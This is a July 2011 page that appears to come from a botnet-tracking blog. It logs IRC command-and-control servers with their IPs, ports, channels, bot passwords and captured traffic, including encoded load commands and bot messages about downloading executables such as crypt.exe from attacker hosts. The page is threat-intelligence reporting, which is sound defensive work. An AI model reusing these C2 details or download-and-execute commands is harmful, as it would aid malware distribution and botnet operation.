Month: July 2011

ab.sweetgrimescorn.com(irc botnet hosted in Malaysia Johor Bahru Piradius Net)

Uncategorized

Remote Host Port Number 124.217.225.223 1866 NICK n[USA|XP|COMPUTERNAME]wglotbs USER hh “” “lol” :hh JOIN #!h! PONG 422 Now talking in #!h! Topic On: [ #!h! ] [ .load /99/106/112/81/55/59/40/104/125/126/121/121/116/115/116/104/98/122/125/113/96/121/108/65/86/113/123/127/36/116/118/103/47/112/47/69/121/102/ ] Topic By: [ x ] (x) .im /99/106/112/81/55/59/40/108/121/110/104/104/111/115/124/45/117/96/105/103/106/127/105/74/70/118/123/52/105/120/116/37/102/98/98/69/99/108/102/73/55/112/106/101/60/44/55/57/59/66/64/92/99/ hosting infos: http://whois.domaintools.com/124.217.225.223

77.235.59.223(irc botnet hosted in Netherlands Amsterdam Eurovps)

Uncategorized

Remote Host Port Number 195.122.131.16 80 77.235.59.223 4042 PASS google_cache2.tmp NICK n[USA|XP]248794 USER 1258 “” “TsGh” :1258 JOIN #cash# abc PONG 422 PRIVMSG #cash# :[Download]: Downloading File From: http://rapidshare.com/files/3610997420/up5.exe, To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe PRIVMSG #cash# :[Download]: Failed To Download File Reason: Unknown * The data identified by the following URL was then requested fromRead more...

1.stipriz.tk(botnet hosted in Turkey Ankara Turk Telekomunikasyon Anonim Sirketi)

Uncategorized

Remote Host Port Number 212.174.140.16 6667 NICK new[iRooT-XP-USA]645209 USER 4925 “” “TsGh” :4925 JOIN #abece WTF NICK [iRooT-XP-USA]454180 USER 4541 “” “TsGh” :4541 NICK [iRooT-XP-USA]930016 USER 9300 “” “TsGh” :9300 Now talking in #abece Topic On: [ #abece ] [ !p2p ] Topic By: [ Samuray ] Joins: [iRooT-W7-BEL]016772 [0167@d5152B53A.access.telenet.be] encore un flamand lol Joins:Read more...

gbin2.no-ip.info(4k gbot used by Bundy hf hecker hosted in Russian Federation Moscow Iqhost Ltd)

Uncategorized

HF hecker using no-ip to host 4k bots Remote Host Port Number 193.106.172.77 1337 gBot gBot 64.62.181.43 80 Invisible Users: 2360 Operators: 2 operator(s) online Channels: 6 channels formed Clients: I have 2361 clients and 0 servers Local users: Current Local Users: 2361 Max: 5517 Global users: Current Global Users: 2361 Max: 4206 NICK n{USA|XP}zkvvxlyRead more...

nathanisqueer.com(ngrBot hosted in Lithuania Vilnius Splius Uab)

Uncategorized

Another big botnet using ngrBot Resolved : [nathanisqueer.com] To [77.79.9.5] Remote Host Port Number 213.251.170.52 80 77.79.9.5 80 77.79.9.5 1863 PASS ngrBot NICK n{US|XPa}ofxxist USER ofxxist 0 0 :ofxxist JOIN #ngr ngrbot PRIVMSG #ngr :[d=”http://77.79.9.5/crypt.exe” s=”225280 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataOcxaxo.exe” – Download retries: 0 Outgoing connection to remote server: 77.79.9.5 TCPRead more...